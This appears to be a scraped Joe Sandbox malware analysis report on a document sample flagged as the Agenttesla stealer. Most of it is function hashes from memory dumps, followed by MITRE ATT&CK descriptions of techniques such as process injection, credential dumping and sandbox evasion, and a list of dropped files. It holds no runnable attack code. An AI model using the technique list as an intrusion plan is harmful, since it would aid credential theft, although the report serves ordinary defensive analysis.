Instruction ID: 98156f6e305d1647dab1de756d462461ce5daddce7b8f06c9448e7f544bf5b78
Opcode Fuzzy Hash: f7e97a5ca174cd872b2b022c6ab3271b01197c5e5b5af956023e39dd4945aa7f
Instruction Fuzzy Hash: 15316D34E146099FCB15DF65D899AAEB7F2AF89300F11C52AE806EB350DB70AC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00392168 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5971c4ec648f1629a9d1a80aa0a1d5e7e915e1af4d83fd5550c65e038a7dbaa0
Instruction ID: a1a03905e016d7e30377e8e6f5b0653233f81e8be9dc3d434f6518c2d89f21c6
Opcode Fuzzy Hash: 5971c4ec648f1629a9d1a80aa0a1d5e7e915e1af4d83fd5550c65e038a7dbaa0
Instruction Fuzzy Hash: 79410170D003489FDB15DF99C884ADEBBB5BF88314F608429E809AB254DB74AA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0039FDA0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7e58111d888ecbb5f44d6132fdea0717e2aa107e8247d247ce952f38a841c7a
Instruction ID: 3d5747fd4488259f3c3989989a3811158cb86e6d2801f552c314e73367199cec
Opcode Fuzzy Hash: e7e58111d888ecbb5f44d6132fdea0717e2aa107e8247d247ce952f38a841c7a
Instruction Fuzzy Hash: D1218D75E002059FDF15DF68E885AEEBBF1AB88300F108126E905EB351EB38ED418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0039FDB0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f44f4357af3c7491f1ec67bf27bf6ab4a09d7a222ece15a6e9445f71b664d813
Instruction ID: ddf93571c7e3beb02b0b2e7cda4d76267017b2c08f2cb7d6245db7f668fc085d
Opcode Fuzzy Hash: f44f4357af3c7491f1ec67bf27bf6ab4a09d7a222ece15a6e9445f71b664d813
Instruction Fuzzy Hash: DE214F75F002199FDF11DF69E845AAEBBF5EB88310F118026E905EB355E735ED408B50

Uniqueness

Uniqueness Score: -1.00%

Function 00397F10 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e523ab71ed6ca5723212adc5464f9e766c1028d33697f88f8bcc846db54ea4d9
Instruction ID: 3e64e5e38326eaf547c0ad53bf1c6e353a3c61dda682467f5fac4e7662057ec4
Opcode Fuzzy Hash: e523ab71ed6ca5723212adc5464f9e766c1028d33697f88f8bcc846db54ea4d9
Instruction Fuzzy Hash: 8E212131A1420A9BDB15DF65D4956DEF7B2EF89300F11C51AE806FB390DB70AD85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00397E01 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9333b7a2a974c53b306f8c5ce4baa4c88356cb68097ac6a8faa2217cb5fbb575
Instruction ID: dccf3794d5fc033947eb9b60cbf0f26f893f0c476efde41270bb7958a109a5a6
Opcode Fuzzy Hash: 9333b7a2a974c53b306f8c5ce4baa4c88356cb68097ac6a8faa2217cb5fbb575
Instruction Fuzzy Hash: F9219231E143059BDB1ACFA4C845ADEB7B6AF89300F21855AF815BB390EB70AD42CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00391529 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ccd1604aea6a1169f329f3f4093423c89560063f53dce1d439eef874d92fa91
Instruction ID: cd626777a15abf841f7ed2e0d86ff08a3237b1524f7921f747f7dbe71071160b
Opcode Fuzzy Hash: 5ccd1604aea6a1169f329f3f4093423c89560063f53dce1d439eef874d92fa91
Instruction Fuzzy Hash: 8E21B3356243014FEF12FB28F88D76D3711EB8A354F12CD66E506CB695DA389E42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00391381 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d0e1d6f8962359e38d024774ab029c5b8ded89d19ae65418e83cf42ef5d726d
Instruction ID: dd60ac90bb40c51474297c8a68950582cd8e40ed414c88c39bcc8167e3c2fbba
Opcode Fuzzy Hash: 3d0e1d6f8962359e38d024774ab029c5b8ded89d19ae65418e83cf42ef5d726d
Instruction Fuzzy Hash: 8821E7746042428FDF376738E4D837D3B71EB5B315F15486AE046DBAA1C6298CC1C702

Uniqueness

Uniqueness Score: -1.00%

Function 001FD110 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883315426.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fd000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81bde3ea201ae39b6dd8722432e3bc9199e97235e5cdb44b7723db5e70ca9ee3
Instruction ID: 8a6165f357da571104d31b476c4adb57f1ff5780ca4ab047869ce4f2a99c2908
Opcode Fuzzy Hash: 81bde3ea201ae39b6dd8722432e3bc9199e97235e5cdb44b7723db5e70ca9ee3
Instruction Fuzzy Hash: C221F675608248DFEB08DF14E8C0B36BB66EB84314F34C5ADD9494B346C336D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00397E10 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9b1b4c2471d3fd0ec4c6cd86aa087aad2e26377e1aeec30af784d7055de988
Instruction ID: 7164579882e5cf4791494191bd9773c0c9a893314147729e2c139c579a047fda
Opcode Fuzzy Hash: 8b9b1b4c2471d3fd0ec4c6cd86aa087aad2e26377e1aeec30af784d7055de988
Instruction Fuzzy Hash: B4216F31E143199BCF19CFA9D445A9EB7B6BF89300F21856AE815FB390DB70AC42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00391710 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef90ed06a494097518256f5155f4f1ff4cde98e1961df4881cfa4d6b21110c97
Instruction ID: 4048b92bb6ca9bcb3a5756a5f57d50dc528a073aeb57283f543911a039f41a66
Opcode Fuzzy Hash: ef90ed06a494097518256f5155f4f1ff4cde98e1961df4881cfa4d6b21110c97
Instruction Fuzzy Hash: E7212834B00206CFDF25EBB4D5556AE77F6AB99340F200868D406EB2A0DF359D41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00391538 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 136412d9bc5a4219129061625492094d3306ca0842951ac5eaf963c5dbacc37e
Instruction ID: bbb0ff80b9e529c9c2977c416107fd0602271d5312b9ec4af1b44b29f5e3b7a0
Opcode Fuzzy Hash: 136412d9bc5a4219129061625492094d3306ca0842951ac5eaf963c5dbacc37e
Instruction Fuzzy Hash: F321A1346202064FEF22FB28F48D75D3715EBCA354F12CD21E506CB255DA38EE428B91

Uniqueness

Uniqueness Score: -1.00%

Function 00394E18 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db00d9243b265eb07e17275c657167caec1b96b41c0807a59817e5db0635fc25
Instruction ID: f182a9bb3e76b63bb801fd7e2266976bc2739bce88e9717ee6b11cc8890654a4
Opcode Fuzzy Hash: db00d9243b265eb07e17275c657167caec1b96b41c0807a59817e5db0635fc25
Instruction Fuzzy Hash: 1B21C634A00214CFDB55EB78E958BADB7F6BB89305F104468E506EB3A1DB359D01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00390838 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175ce435ab45ff5df7915a6666196fd7bea1a095bad43758987f6db16a552699
Instruction ID: 37b72692a1225026550f5b16a722479fe6f4e62bba5e5b7f63b56cdd133381ca
Opcode Fuzzy Hash: 175ce435ab45ff5df7915a6666196fd7bea1a095bad43758987f6db16a552699
Instruction Fuzzy Hash: 6A110631B0C3448FEF2BA679A8403B937959B96314F268D7ED046CF682DA29CD458BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00390848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f31d5288181564a66f37ac69c900ecd564c47429e83a09747a789c6df781c299
Instruction ID: e5264de7f76cbc8169bcb316d5eae19dcdf997ab9864237da3823ae361c37530
Opcode Fuzzy Hash: f31d5288181564a66f37ac69c900ecd564c47429e83a09747a789c6df781c299
Instruction Fuzzy Hash: 2311C231B082048FEF2AAB79E44477A73D5EB86354F22893AE106CF751DB25CD818BC1

Uniqueness

Uniqueness Score: -1.00%

Function 00391648 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7aece4a184bbbc5cd01a809ddc7214b8bb50fe6dc654374f6689d9c5941f09
Instruction ID: d2e31a6fddf298431adfbf3ec6a8e8fdbb552d96bb788274e1e4e7fd3486c343
Opcode Fuzzy Hash: 8d7aece4a184bbbc5cd01a809ddc7214b8bb50fe6dc654374f6689d9c5941f09
Instruction Fuzzy Hash: 2511C231F00211DFCF11AF78A8497AE7FF2AB88750F154666E906E3754EA348912CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0039FEC0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e4e3357f5e093fa4e1e4a43aaeb069ee237317096b8c53c1496e73d1e400cae
Instruction ID: 3130acb89df9196d24983f123310fd0f84b3d3f2e0f3ad98d98ca8e51ba0aa3d
Opcode Fuzzy Hash: 6e4e3357f5e093fa4e1e4a43aaeb069ee237317096b8c53c1496e73d1e400cae
Instruction Fuzzy Hash: 5D11A131B001284FCF15DA78D8196AE77AAEBC9350F01813AE406EB350EE75EC028BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0039FB78 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12381f11d8da015b4e0848934c3a10181e9e2cbd3b823544ebf989deff904643
Instruction ID: f1d5f72b8908be3849a67483ae7592556772db826e28e03319854e6d9e5e3aef
Opcode Fuzzy Hash: 12381f11d8da015b4e0848934c3a10181e9e2cbd3b823544ebf989deff904643
Instruction Fuzzy Hash: BA21E3B1D002599FCB11DFAAD884ADEFFB4FB49310F20822AE518B7250C3749554CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 003964DC Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 676fb8d0f10aeecab172e6913aca8a7d9b98a79796dc56823c0bce63f844c25e
Instruction ID: f03a01b76bc7d8f839093b6e0c940e122477416cfc5a778f12aa1efaca1bd0c4
Opcode Fuzzy Hash: 676fb8d0f10aeecab172e6913aca8a7d9b98a79796dc56823c0bce63f844c25e
Instruction Fuzzy Hash: F021C4B1D002199FCB01DF9AD984ADEFBB4FB49350F20812AE918B7300C374A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0039FEB0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e3e24fbbc0ff1723ed94eb706112f81504629f3ffe3018d14f03002ac3d080
Instruction ID: 5876e4288acde5361765b6d346fc6dfa787b91681655a7bc0d43cefafa017ca2
Opcode Fuzzy Hash: b6e3e24fbbc0ff1723ed94eb706112f81504629f3ffe3018d14f03002ac3d080
Instruction Fuzzy Hash: 2901B132B141144FCF15EA78AC256EF7BEA9BC9300F01413BE486DB284EE69AC0687D1

Uniqueness

Uniqueness Score: -1.00%

Function 00391498 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93fd8ad817846881019fe64474ff8ca0b9f79d4b673425feb52854399ffcc90b
Instruction ID: ec800900dd6d6e4520667e2c0cd80b9f9cf78276632c0a42ca731ee8d0b1c7ee
Opcode Fuzzy Hash: 93fd8ad817846881019fe64474ff8ca0b9f79d4b673425feb52854399ffcc90b
Instruction Fuzzy Hash: CF014031A012169FCF26EFB984851AE7BF5EB49311B26047AD406EB301EA35DC418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 001FD10B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883315426.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fd000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
Instruction ID: dbe2a0e42daf476867502fd66ad308fee7d0cb6db53bacef849aa94f6f8b0d41
Opcode Fuzzy Hash: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
Instruction Fuzzy Hash: B111D075508244CFDB05CF14D9C4B25BF62FB44314F28C6A9DD494B256C33AD84ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 00396DB0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_390000_microme09255.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4ccefbac7f037361ac994e2c35f1da50046b416f39927235dc11ee4bac0225
Instruction ID: d5bda416b5a8f7c0045edcf6dc52cef91573ebcdb54f93a7268aa6a63a051a4b
Opcode Fuzzy Hash: cf4ccefbac7f037361ac994e2c35f1da50046b416f39927235dc11ee4bac0225
Instruction Fuzzy Hash: 6DF019349203089FDB04FFB8E59A59D7BB5AB84201F50C969E1059F255EA753B058B80

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Swift.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microm[1].scr

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1654943A-8722-402F-85B2-DE354B391398}.tmp

